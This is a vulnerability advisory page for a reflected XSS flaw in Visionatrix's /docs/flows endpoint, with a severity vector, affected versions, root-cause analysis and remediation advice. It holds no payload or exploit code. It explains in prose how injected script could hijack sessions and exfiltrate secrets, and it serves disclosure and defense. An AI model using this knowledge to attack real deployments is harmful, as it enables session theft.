EUVD-2025-18919
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L
Lifecycle Timeline
3Description
Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS (Cross-Site Scripting) attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation uses the get_swagger_ui_html function from FastAPI. This function does not encode or sanitize its arguments before using them to generate the HTML for the swagger documentation page and is not intended to be used with user-controlled arguments. Any user of this application can be targeted with a one-click attack that can takeover their session and all the secrets that may be contained within it. This issue has been patched in version 2.5.1.
Analysis
Visionatrix versions 1.5.0 through 2.5.0 contain a Reflected XSS vulnerability in the /docs/flows endpoint that allows unauthenticated attackers to execute arbitrary JavaScript in users' browsers. The vulnerability stems from improper use of FastAPI's get_swagger_ui_html function with unsanitized user-controlled input, enabling session hijacking and exfiltration of application secrets. The CVSS 8.8 score reflects high severity due to network accessibility, low attack complexity, and no privilege requirements, though user interaction is required to trigger the exploit.
Technical Context
Visionatrix is an AI media processing application built on ComfyUI that uses FastAPI for its REST API and Swagger UI for API documentation. The vulnerability exists in the /docs/flows endpoint implementation, which improperly invokes FastAPI's get_swagger_ui_html() function without sanitizing arguments before HTML generation. CWE-79 (Improper Neutralization of Input During Web Page Generation) identifies the root cause: the function was designed for internal, trusted use and does not perform HTML encoding or input validation on its parameters. When user-controlled data (such as query parameters or path segments) is passed directly to get_swagger_ui_html(), it renders unencoded into the HTML document, allowing attackers to inject malicious JavaScript that executes in the victim's browser context with full access to session cookies, localStorage, and application state.
Affected Products
Visionatrix AI Media Processing Tool: versions 1.5.0, 1.5.1, 1.6.0, 1.7.x, 2.0.x, 2.1.x, 2.2.x, 2.3.x, 2.4.x, and 2.5.0 are vulnerable. CPE identifiers would follow the pattern: cpe:2.3:a:visionatrix:visionatrix:*:*:*:*:*:*:*:* with version range [1.5.0, 2.5.1). Patched version: 2.5.1 and later. The vulnerability affects all installations of Visionatrix within the vulnerable version range, regardless of deployment architecture (local, cloud, container), as the flaw exists in the core FastAPI endpoint logic.
Remediation
Immediate patching is required: upgrade Visionatrix from any version in the range 1.5.0–2.5.0 to version 2.5.1 or later. This patch likely implements proper input sanitization (HTML encoding) or removes the use of unsanitized user input to get_swagger_ui_html(). Until patching is feasible: (1) Disable or restrict access to the /docs/flows endpoint via reverse proxy (nginx/Apache rules to block requests to /docs/flows); (2) Implement network-level access controls (firewall rules, WAF rules) to limit who can reach the application; (3) Use HTTP-only and Secure flags on session cookies to prevent JavaScript access (though this is only a partial mitigation for XSS-based exfiltration); (4) Monitor and rotate any secrets that may have been exposed if the application is already deployed. Apply version 2.5.1 as the definitive fix. Check vendor repository/release notes (likely GitHub Visionatrix project) for patch details and upgrade procedures.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today